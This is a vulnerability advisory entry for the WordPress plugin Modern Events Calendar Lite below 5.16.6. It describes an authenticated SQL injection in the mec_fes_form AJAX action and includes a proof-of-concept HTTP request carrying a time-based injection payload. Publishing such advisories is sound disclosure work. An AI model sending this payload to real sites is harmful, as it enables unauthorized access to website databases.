Lucene search

K
wpvulndbKhanhWPVDB-ID:26819680-22A8-4348-B63D-DC52C0D50ED0
HistoryJan 29, 2021 - 12:00 a.m.

Modern Events Calendar Lite < 5.16.6 - Authenticated SQL Injection

2021-01-2900:00:00
khanh
wpscan.com
4

The plugin did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue. If the Frontend Event Submission form is embed in a public page, then it could lead to any authenticated user, like subscribers to perform such SQL Injection.

PoC

https://drive.google.com/file/d/1-2tvODEzr1zLb8CmIGmODe5470_YHsqX/view?usp=sharing POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/wordpress-5.5/wp-admin/post.php?post=407&amp;action;=edit Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 73 Connection: close Cookie: [author+ cookies] action=mec_fes_form&mec;%5bpost_id%5d=1+or+sleep(1)%23&_wpnonce=212479b1e1

CPENameOperatorVersion
modern-events-calendar-litelt5.16.6
Related for WPVDB-ID:26819680-22A8-4348-B63D-DC52C0D50ED0